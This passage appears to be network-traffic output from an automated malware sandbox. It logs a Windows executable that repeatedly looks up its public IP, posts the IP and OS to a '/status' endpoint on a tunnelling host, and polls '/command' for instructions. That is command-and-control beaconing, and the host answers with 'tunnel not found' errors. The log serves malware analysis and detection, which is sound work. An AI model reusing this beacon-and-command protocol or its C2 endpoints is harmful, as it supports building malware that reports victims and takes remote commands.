              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              13192.168.2.549763167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:36.583581924 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:29:36.703224897 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:29:37.774983883 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:37.775005102 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              14192.168.2.549768167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:37.896727085 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:29:39.135886908 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:39.135961056 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              15192.168.2.549784172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:44.252919912 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:29:45.343395948 CET426INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:29:45 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cb9d5e1742be-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=2070&rtt_var=1035&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              16192.168.2.549785167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:45.465281963 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:29:45.584738016 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:29:46.704885960 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:46.704922915 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              17192.168.2.549790167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:46.831080914 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:29:48.064723969 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:48.064821005 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              18192.168.2.549806172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:53.186218023 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:29:54.283226013 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:29:54 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cbd53d988c1d-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1810&rtt_var=905&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              19192.168.2.549811167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:54.403994083 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:29:54.523399115 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:29:55.641875029 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:55.641901970 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              20192.168.2.549814167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:29:55.763283968 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:29:57.008658886 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:29:57.008681059 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              21192.168.2.549830172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:02.141962051 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:30:03.238280058 CET426INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:30:03 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cc0d2d1b425d-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=2128&min_rtt=2128&rtt_var=1064&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              22192.168.2.549836167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:03.802741051 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:30:03.922065973 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:30:05.037986994 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:05.038131952 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              23192.168.2.549839167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:05.159054995 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:30:06.416548967 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:06.416699886 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              24192.168.2.549854172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:11.530519962 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:30:12.627836943 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:30:12 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cc47d8ea447a-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1597&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              25192.168.2.549859167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:12.750288010 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:30:12.869678020 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:30:13.997986078 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:13.998017073 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              26192.168.2.549863167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:14.119417906 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Dec 11, 2024 11:30:15.358217001 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:15.358347893 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              27192.168.2.549878172.67.74.152801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:20.468250990 CET115OUTGET /?format=text HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: api.ipify.org
              Connection: close
              Dec 11, 2024 11:30:21.563906908 CET425INHTTP/1.1 200 OK
              Date: Wed, 11 Dec 2024 10:30:21 GMT
              Content-Type: text/plain
              Content-Length: 12
              Connection: close
              Vary: Origin
              CF-Cache-Status: DYNAMIC
              Server: cloudflare
              CF-RAY: 8f04cc7fbd5f0f4a-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1489&min_rtt=1489&rtt_var=744&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=115&delivery_rate=0&cwnd=166&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 37 35
              Data Ascii: 8.46.123.175


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              28192.168.2.549881167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:21.685508966 CET171OUTPOST /status HTTP/1.1
              Content-Length: 39
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
              Host: pepwuecibr.eu.loclx.io
              Connection: close
              Content-Type: application/json
              Dec 11, 2024 11:30:21.806113005 CET39OUTData Raw: 7b 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 20 22 6f 73 22 3a 20 22 57 69 6e 64 6f 77 73 22 7d
              Data Ascii: {"ip": "8.46.123.175", "os": "Windows"}
              Dec 11, 2024 11:30:22.922102928 CET1236INHTTP/1.0 404 Not FoundContent-Type: text/html<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 TUNNEL NOT FOUND</title><link href="https://fonts.googleapis.com/css?family=Nunito:700,900" rel="stylesheet"></head><style>* { -webkit-box-sizing: border-box; box-sizing: border-box;}body { padding: 0; margin: 0;}#error { position: relative; height: 100vh; background-image: linear-gradient(#0b1326 50%, #0e1931 90%);}#error .error { position: absolute; left: 50%; top: 50%; -webkit-transform: translate(-50%, -50%); -ms-transform: translate(-50%, -50%); transform: translate(-50%, -50%);}.error { max-width: 767px; width: 100%; line-height: 1.4; text-align: center;}.error .error-msg { position: relative; margin-bottom: 20px; z-index: -1;}.error .error-msg h1 { font-family: 'Nunito', sans-s [TRUNCATED]
              Data Raw:
              Data Ascii:
              Dec 11, 2024 11:30:22.922131062 CET848INData Raw: 6e 74 2d 77 65 69 67 68 74 3a 20 39 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 31 32 70 78 3b 0a 20 20 63
              Data Ascii: nt-weight: 900; margin-top: 0px; margin-bottom: 0px; margin-left: -12px; color: #E23E57;text-shadow: 3px 3px #ffffff; text-transform: uppercase; letter-spacing: -20px;}.error .error-msg h2 { font-family: 'Nunito', sans-serif;


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              29192.168.2.549886167.99.38.229801488C:\Users\user\Desktop\jgbC220X2U.exe
              TimestampBytes transferredDirectionData
              Dec 11, 2024 11:30:23.043363094 CET119OUTGET /command HTTP/1.1
              User-Agent: cpp-httplib/0.18.0
              Accept: */*
